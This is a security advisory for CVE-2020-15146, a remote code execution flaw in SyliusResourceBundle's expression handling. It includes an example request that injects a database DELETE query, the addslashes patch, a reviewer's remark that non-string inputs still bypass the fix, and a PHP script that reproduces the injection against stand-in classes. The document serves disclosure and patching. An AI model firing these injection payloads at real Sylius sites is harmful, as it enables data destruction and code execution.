CVE-2020-15146
Remote Code Execution in SyliusResourceBundle
Severity: CRITICAL 9.6 | EPSS 1.1%
Description
### Impact

Request parameters injected into an expression evaluated by the `symfony/expression-language` package were not sanitized properly. The parameter value is pasted into the expression inside a double-quoted string literal, so an attacker can close that literal with a `"` and append arbitrary expression code. The expression is evaluated with access to the service container, which lets the attacker call any public service and leads to Remote Code Execution.

Vulnerable versions: `<=1.3.13 || >=1.4.0 <=1.4.6 || >=1.5.0 <=1.5.1 || >=1.6.0 <=1.6.3`.

### Example

```yaml
sylius_grid:
    grids:
        foo:
            fields:
                bar:
                    options:
                        baz: "expr:service('sylius.repository.product').find($id)"
```

Here `$id` comes from the request and can be crafted so that the expression calls other services. Visiting

`/route?id="~service('doctrine').getManager().getConnection().executeQuery("DELETE * FROM TABLE")~"`

produces the expression

`expr:service('sylius.repository.product').find(""~service('doctrine').getManager().getConnection().executeQuery("DELETE * FROM TABLE")~"")`

where `~` is the expression language's string concatenation operator. The injected `executeQuery(...)` call runs against the currently connected database while the argument to `find()` is being evaluated, before `find()` itself is reached.

To check whether your application is affected, look for any routing or grid definition that interpolates request parameters into an `expr:` expression.

### Patches

This issue has been patched in versions 1.3.14, 1.4.7, 1.5.2 and 1.6.4. Versions prior to 1.3 have not been patched.

### Workarounds

If you cannot upgrade, apply the same change locally: add `addslashes` in `OptionsParser::parseOptionExpression` so that user input is escaped before it is placed inside the double-quoted literal and evaluated by the expression language.

```php
- return is_string($variable) ? sprintf('"%s"', $variable) : $variable;
+ return is_string($variable) ? sprintf('"%s"', addslashes($variable)) : $variable;
```

### Acknowledgements

This security issue has been reported by Craig Blanchette (@isometriks), thanks a lot!

### For more information

If you have any questions or comments about this advisory:

* Email us at [[email protected]](mailto:[email protected])
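Review bot: the `+` line escapes only the string branch; a request parameter that arrives as an array (`?id[]=...`) or any other non-string value takes the `: $variable` branch and is returned unchanged, so a type check (reject, or cast to string and escape, anything that is not a scalar) belongs next to the `addslashes` call. For the string branch `addslashes` is adequate here because the value is embedded in a double-quoted literal and the expression language's lexer unescapes `\"`, `\'` and `\\` when it tokenizes that literal, so the attacker's quotes can no longer terminate it.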
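The quoting bug and the `addslashes` fix, reduced to a script that can be run outside Sylius. This is an added example, not Sylius code: `buildExpression()` stands in for `OptionsParser::parseOptionExpression`, the `service()` expression function is registered against a small in-memory registry instead of the Symfony container, and the `Repository`, `Doctrine`, `Manager` and `Connection` classes are stand-ins in which `Connection` only records the SQL it is handed. It assumes `symfony/expression-language` is installed with Composer.

```php
<?php
// Added example for CVE-2020-15146 (not Sylius code). Assumes
// symfony/expression-language is installed with Composer.
require __DIR__ . '/vendor/autoload.php';

use Symfony\Component\ExpressionLanguage\ExpressionLanguage;

// Stand-ins for container services. Connection records every query instead
// of running one, so the effect of an injection is observable.
final class Repository
{
    public function find(string $id): string { return "row:$id"; }
}
final class Connection
{
    public static array $executed = [];
    public function executeQuery(string $sql): string { self::$executed[] = $sql; return 'ok'; }
}
final class Manager
{
    public function getConnection(): Connection { return new Connection(); }
}
final class Doctrine
{
    public function getManager(): Manager { return new Manager(); }
}

// Minimal registry standing in for the Symfony service container.
$services = [
    'sylius.repository.product' => new Repository(),
    'doctrine'                  => new Doctrine(),
];

$el = new ExpressionLanguage();
// service('id') resolves an id against the registry passed as the
// "services" variable (only the evaluator is used here, not the compiler).
$el->register(
    'service',
    fn (string $id): string => sprintf('service(%s)', $id),
    fn (array $vars, string $id): object => $vars['services'][$id],
);

/**
 * Stand-in for OptionsParser::parseOptionExpression: replaces every $name
 * placeholder in the template with the request parameter of that name.
 * String values are wrapped in double quotes; with $escape=false the value
 * is pasted verbatim (vulnerable), with $escape=true it passes through
 * addslashes() first (patched).
 */
function buildExpression(string $template, array $params, bool $escape): string
{
    return preg_replace_callback('/\$(\w+)/', function (array $m) use ($params, $escape): string {
        $v = $params[$m[1]];
        if (!is_string($v)) {
            return (string) $v;  // numbers are pasted as bare literals
        }
        return sprintf('"%s"', $escape ? addslashes($v) : $v);
    }, $template);
}

$template = "service('sylius.repository.product').find(\$id)";

// Attacker-controlled ?id= value: closes the "" literal with ", splices in
// a service call with the ~ concatenation operator, and reopens the literal
// so that the expression still parses.
$payload = '"~service(\'doctrine\').getManager().getConnection()'
         . '.executeQuery("DELETE FROM product")~"';

// 1. Vulnerable build: the injected executeQuery() call runs while the
//    argument of find() is evaluated.
$expr   = buildExpression($template, ['id' => $payload], false);
$result = $el->evaluate($expr, ['services' => $services]);
printf("vulnerable: %s\n  result=%s executed=%s\n", $expr, $result, json_encode(Connection::$executed));

// 2. Patched build: addslashes() turns " into \", the lexer unescapes it
//    when tokenising the literal, and the whole payload reaches find() as data.
Connection::$executed = [];
$expr   = buildExpression($template, ['id' => $payload], true);
$result = $el->evaluate($expr, ['services' => $services]);
printf("patched: %s\n  result=%s executed=%s\n", $expr, $result, json_encode(Connection::$executed));
```

In the first run `Connection::$executed` holds the injected query and `find()` receives only the string returned by `executeQuery()`; in the second run `Connection::$executed` stays empty and `find()` receives the attacker's entire payload as an ordinary string argument. The non-string branch is kept deliberately: in the real parser a value that arrives as an array would also bypass `addslashes`, so a production fix should reject or cast non-scalar parameters before this point.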
Affected packages (1)
- Packagist / sylius/resource-bundle: >= 1.4.0, < 1.4.7
CVSS score
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | CRITICAL 9.6 | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N |
References (5)
- ADVISORY: https://nvd.nist.gov/vuln/detail/CVE-2020-15146
- PATCH: https://github.com/Sylius/SyliusResourceBundle
- WEB: https://github.com/FriendsOfPHP/security-advisories/blob/master/sylius/resource-bundle/CVE-2020-15146.yaml
- WEB: https://github.com/Sylius/SyliusResourceBundle/commit/73d9aba182947473a5935b31caf65ca263091e00
- WEB: https://github.com/Sylius/SyliusResourceBundle/security/advisories/GHSA-h6m7-j4h3-9rf5